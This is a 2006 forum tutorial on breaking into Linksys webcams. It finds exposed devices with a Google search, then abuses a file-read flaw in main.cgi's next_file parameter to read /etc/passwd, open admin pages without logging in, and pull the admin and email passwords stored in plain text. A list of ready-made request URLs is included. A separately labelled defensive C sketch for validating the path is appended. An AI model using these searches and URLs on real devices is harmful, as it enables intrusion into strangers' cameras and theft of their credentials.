zbeng
Posted September 9, 2006

I. Finding a target.
II. The problem.
III. Accessing the Admin panel.
IV. Finding emails and passwords.
V. Conclusions.

#########################
 I. Finding a target.
#########################

For this part of the tutorial, we'll utilize a simple google hack. If you search johnny.ihackstuff.com for Linksys Webcams you'll find something like this:

inurl:main.cgi

The search that I utilized was:

inurl:main.cgi?next_file=

The service may be running on any number of ports, but the most common ports that I've seen are ports 80 and 1024.

#####################
 II. The problem.
#####################

Once you've found a webcam using google, open the link in your favorite web browser. You'll see something like this in your browser.

http://127.0.0.1:1024/main.cgi?next_file=img/main.htm

The problem that makes this hack possible is that main.cgi?next_file accepts any file, and reads it into the browser. So, obviously you could access /etc/passwd.

http://127.0.0.1:1024/main.cgi?next_file=/etc/passwd

But, we're going for something more interesting.

####################################
 III. Accessing the Admin panel.
####################################

There are any number of ways the web interface could be set up, but this will only cover the default setup. Hacking any derivatives from this style should not be difficult at all. Just look at the HTML source code and find where the admin page urls are located.

At the top of your page you will see a panel with something like this.

Home View Video Setup Linksys WEB Help Exit

Setup is the one we want. If you look at the source code you'll see that the link to setup is...

http://127.0.0.1:1024/adm/file.cgi?next_file=basic.htm

Clicking on the link prompts for the username and password of the router. Remember main.cgi? Yeah, well since we can read any file on the system we're going to load basic.htm, the setup panel, without needing a password.

http://127.0.0.1:1024/main.cgi?next_file=adm/basic.htm

Wow look at that. However, if you try to access something else from the regular administrative menu, you will be prompted for a user/pass combo. Now that we see how to load the menu, it's a trivial matter to obtain a legitimate password.

http://127.0.0.1:1024/main.cgi?next_file=a...adm/pass_wd.htm

Just look at the source code, around where the form is located and in plain text there is the user/pass. In order to access anything else in the admin menu, just open it up with main.cgi?next_file=adm/.

Common Administrative Files.

http://127.0.0.1:1024/main.cgi?next_file=system.htm
http://127.0.0.1:1024/main.cgi?next_file=basic.htm
http://127.0.0.1:1024/main.cgi?next_file=image.htm
http://127.0.0.1:1024/main.cgi?next_file=pass_wd.htm
http://127.0.0.1:1024/main.cgi?next_file=users.htm
http://127.0.0.1:1024/main.cgi?next_file=status.htm
http://127.0.0.1:1024/main.cgi?next_file=advanced.htm

#######################################
 IV. Finding emails and passwords.
#######################################

One final interesting endeavor is to extract the password of the user's email account. There's an option in Linksys that allows it to email you when the motion sensor is set off. The user/pass of the email account may also be stored in plain text.

http://127.0.0.1:1024/main.cgi?next_file=a...dm/advanced.htm

####################
 V. Conclusions.
####################

I've only run into one webcam that successfully blocked this type of access. The result was a 403 webserver error. So if you want to keep your passwords safe you might want to look into file permissions and other forms of data protection for your web camera.

#####################################################################

That's all for this article. I appreciate you reading this far. If you have any input/criticism please email me.

stderr [dot] dev [at] gmail [dot] com.

Shouts: cult, kaZm, SheepByte, and 34019.

-stderr
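On the defensive side, the root cause described in the post is that main.cgi serves whatever path arrives in next_file without checking the path or the session. The following is an added example, not code from the post or from the vendor's firmware: a sketch of the server-side check such a handler needs before opening the file. The function names, the 64-byte limit and the contents of the public allowlist are assumptions made for illustration.

```c
#include <ctype.h>
#include <string.h>

/* Pages that may be served without a login. "img/main.htm" is the viewer
   page named in the post; a real device would list its own public pages. */
static const char *const PUBLIC_PAGES[] = { "img/main.htm" };

/* Syntactic check on the already URL-decoded value: relative path only,
   no traversal, conservative character set (so '%', '\\' and NUL tricks
   are rejected too). The 64-byte limit is an assumed bound. */
static int path_is_clean(const char *p)
{
    size_t len;
    if (p == NULL) return 0;
    len = strlen(p);
    if (len == 0 || len > 64) return 0;
    if (p[0] == '/') return 0;                /* absolute: /etc/passwd */
    if (strstr(p, "..") != NULL) return 0;    /* ../ traversal */
    if (strstr(p, "//") != NULL) return 0;
    for (; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-' || c == '/'))
            return 0;
    }
    return 1;
}

/* Returns 1 if next_file may be served to this session, 0 for a 403.
   `authenticated` is the result of the same login that adm/file.cgi
   already demands. */
int next_file_allowed(const char *next_file, int authenticated)
{
    size_t i;
    if (!path_is_clean(next_file)) return 0;
    for (i = 0; i < sizeof PUBLIC_PAGES / sizeof PUBLIC_PAGES[0]; i++)
        if (strcmp(next_file, PUBLIC_PAGES[i]) == 0) return 1;
    /* Anything not explicitly public (adm/basic.htm, pass_wd.htm,
       system.htm, ...) is default-deny without a session. */
    return authenticated ? 1 : 0;
}
```

This check only closes the unauthenticated read path; the credentials embedded in plain text in the admin pages are a separate problem that remains for any authenticated viewer.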